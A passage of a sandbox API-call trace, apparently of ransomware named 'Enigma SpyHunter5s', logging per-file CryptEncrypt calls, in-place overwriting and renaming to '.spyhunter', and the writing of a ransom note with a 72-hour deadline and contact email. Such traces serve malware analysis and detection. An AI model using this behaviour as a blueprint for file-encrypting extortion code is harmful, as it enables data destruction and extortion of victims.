hHeap=0x2c0000) returned 1 [0143.638] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efd0 | out: pbBuffer=0x57efd0) returned 1 [0143.638] GetProcessHeap () returned 0x2c0000 [0143.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.638] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efc8*=0x30) returned 1 [0143.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.638] GetProcessHeap () returned 0x2c0000 [0143.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.638] GetProcessHeap () returned 0x2c0000 [0143.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe4e8 | out: hHeap=0x2c0000) returned 1 [0143.638] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efd0 | out: pbBuffer=0x57efd0) returned 1 [0143.638] GetProcessHeap () returned 0x2c0000 [0143.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.638] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efc8*=0x30) returned 1 [0143.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.639] GetProcessHeap () returned 0x2c0000 [0143.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.639] GetProcessHeap () returned 0x2c0000 [0143.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe428 | out: hHeap=0x2c0000) returned 1 [0143.639] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efc8 | out: pbBuffer=0x57efc8) returned 1 [0143.639] GetProcessHeap () returned 0x2c0000 [0143.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.639] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efc0*=0x30) returned 1 [0143.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.639] GetProcessHeap () returned 0x2c0000 [0143.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.639] GetProcessHeap () returned 0x2c0000 [0143.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffc3c0 | out: hHeap=0x2c0000) returned 1 [0143.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.640] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.640] WriteFile (in: hFile=0xb0, lpBuffer=0x57eefb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57f024, lpOverlapped=0x0 | out: lpBuffer=0x57eefb*, lpNumberOfBytesWritten=0x57f024*=0x127, lpOverlapped=0x0) returned 1 [0143.640] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.641] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57f024, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57f024*=0x2ac, lpOverlapped=0x0) returned 1 [0143.641] CloseHandle (hObject=0xb0) returned 1 [0143.641] GetProcessHeap () returned 0x2c0000 [0143.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7f28 | out: hHeap=0x2c0000) returned 1 [0143.641] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efc0 | out: pbBuffer=0x57efc0) returned 1 [0143.641] GetProcessHeap () returned 0x2c0000 [0143.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.641] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efb8*=0x30) returned 1 [0143.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.641] GetProcessHeap () returned 0x2c0000 [0143.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.641] GetProcessHeap () returned 0x2c0000 [0143.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030dd0 | out: hHeap=0x2c0000) returned 1 [0143.641] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efc0 | out: pbBuffer=0x57efc0) returned 1 [0143.641] GetProcessHeap () returned 0x2c0000 [0143.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.642] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efb8*=0x30) returned 1 [0143.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.642] GetProcessHeap () returned 0x2c0000 [0143.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.649] GetProcessHeap () returned 0x2c0000 [0143.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030d08 | out: hHeap=0x2c0000) returned 1 [0143.650] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efb8 | out: pbBuffer=0x57efb8) returned 1 [0143.650] GetProcessHeap () returned 0x2c0000 [0143.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.650] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efb0*=0x30) returned 1 [0143.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.673] GetProcessHeap () returned 0x2c0000 [0143.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.673] GetProcessHeap () returned 0x2c0000 [0143.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7ba8 | out: hHeap=0x2c0000) returned 1 [0143.673] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efb8 | out: pbBuffer=0x57efb8) returned 1 [0143.673] GetProcessHeap () returned 0x2c0000 [0143.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.673] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efb0*=0x30) returned 1 [0143.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.686] GetProcessHeap () returned 0x2c0000 [0143.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.686] GetProcessHeap () returned 0x2c0000 [0143.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7ac8 | out: hHeap=0x2c0000) returned 1 [0143.686] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efb0 | out: pbBuffer=0x57efb0) returned 1 [0143.686] GetProcessHeap () returned 0x2c0000 [0143.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.686] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efa8*=0x30) returned 1 [0143.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.686] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 73 [0143.686] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0143.686] GetProcessHeap () returned 0x2c0000 [0143.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.687] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ef6c*=0x2800, lpOverlapped=0x0) returned 1 [0143.931] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.931] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ef6c*=0x2800, lpOverlapped=0x0) returned 1 [0143.931] GetProcessHeap () returned 0x2c0000 [0143.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.931] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.932] WriteFile (in: hFile=0xb0, lpBuffer=0x57efac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef6c, lpOverlapped=0x0 | out: lpBuffer=0x57efac*, lpNumberOfBytesWritten=0x57ef6c*=0x4, lpOverlapped=0x0) returned 1 [0143.942] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef6c*=0x30, lpOverlapped=0x0) returned 1 [0143.942] CloseHandle (hObject=0xb0) returned 1 [0143.942] GetProcessHeap () returned 0x2c0000 [0143.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.942] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.spyhunter") returned 83 [0143.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat.spyhunter")) returned 1 [0143.943] GetProcessHeap () returned 0x2c0000 [0143.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.943] GetProcessHeap () returned 0x2c0000 [0143.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.943] GetProcessHeap () returned 0x2c0000 [0143.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7828 | out: hHeap=0x2c0000) returned 1 [0143.943] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efb0 | out: pbBuffer=0x57efb0) returned 1 [0143.943] GetProcessHeap () returned 0x2c0000 [0143.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.944] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efa8*=0x30) returned 1 [0143.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.944] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm") returned 82 [0143.944] StrStrW (lpFirst="Soft Blue.htm", lpSrch=".txt") returned 0x0 [0143.944] GetProcessHeap () returned 0x2c0000 [0143.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.944] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ef6c*=0xe8, lpOverlapped=0x0) returned 1 [0143.945] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.945] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x57ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ef6c*=0xe8, lpOverlapped=0x0) returned 1 [0143.946] GetProcessHeap () returned 0x2c0000 [0143.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.946] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.946] WriteFile (in: hFile=0xb0, lpBuffer=0x57efac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef6c, lpOverlapped=0x0 | out: lpBuffer=0x57efac*, lpNumberOfBytesWritten=0x57ef6c*=0x4, lpOverlapped=0x0) returned 1 [0143.946] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef6c*=0x30, lpOverlapped=0x0) returned 1 [0143.946] CloseHandle (hObject=0xb0) returned 1 [0143.946] GetProcessHeap () returned 0x2c0000 [0143.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.946] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.spyhunter") returned 92 [0143.946] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm.spyhunter")) returned 1 [0143.947] GetProcessHeap () returned 0x2c0000 [0143.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.947] GetProcessHeap () returned 0x2c0000 [0143.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.947] GetProcessHeap () returned 0x2c0000 [0143.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65a78 | out: hHeap=0x2c0000) returned 1 [0143.947] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efa8 | out: pbBuffer=0x57efa8) returned 1 [0143.947] GetProcessHeap () returned 0x2c0000 [0143.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.947] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efa0*=0x30) returned 1 [0143.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.948] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 85 [0143.948] StrStrW (lpFirst="ShadesOfBlue.jpg", lpSrch=".txt") returned 0x0 [0143.948] GetProcessHeap () returned 0x2c0000 [0143.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.948] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ef64*=0x127e, lpOverlapped=0x0) returned 1 [0144.028] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffed82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.028] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x127e, lpNumberOfBytesWritten=0x57ef64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ef64*=0x127e, lpOverlapped=0x0) returned 1 [0144.029] GetProcessHeap () returned 0x2c0000 [0144.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0144.029] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.029] WriteFile (in: hFile=0xb0, lpBuffer=0x57efa4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef64, lpOverlapped=0x0 | out: lpBuffer=0x57efa4*, lpNumberOfBytesWritten=0x57ef64*=0x4, lpOverlapped=0x0) returned 1 [0144.029] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef64, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef64*=0x30, lpOverlapped=0x0) returned 1 [0144.029] CloseHandle (hObject=0xb0) returned 1 [0144.029] GetProcessHeap () returned 0x2c0000 [0144.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0144.029] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.spyhunter") returned 95 [0144.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.spyhunter")) returned 1 [0144.030] GetProcessHeap () returned 0x2c0000 [0144.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0144.030] GetProcessHeap () returned 0x2c0000 [0144.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0144.031] GetProcessHeap () returned 0x2c0000 [0144.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000fb8 | out: hHeap=0x2c0000) returned 1 [0144.031] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57efa8 | out: pbBuffer=0x57efa8) returned 1 [0144.031] GetProcessHeap () returned 0x2c0000 [0144.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0144.031] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57efa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57efa0*=0x30) returned 1 [0144.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0144.032] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 80 [0144.032] StrStrW (lpFirst="Peacock.htm", lpSrch=".txt") returned 0x0 [0144.032] GetProcessHeap () returned 0x2c0000 [0144.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0144.033] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ef64*=0xe8, lpOverlapped=0x0) returned 1 [0144.033] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.034] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x57ef64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ef64*=0xe8, lpOverlapped=0x0) returned 1 [0144.034] GetProcessHeap () returned 0x2c0000 [0144.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0144.034] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.034] WriteFile (in: hFile=0xb0, lpBuffer=0x57efa4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef64, lpOverlapped=0x0 | out: lpBuffer=0x57efa4*, lpNumberOfBytesWritten=0x57ef64*=0x4, lpOverlapped=0x0) returned 1 [0144.034] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef64, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef64*=0x30, lpOverlapped=0x0) returned 1 [0144.034] CloseHandle (hObject=0xb0) returned 1 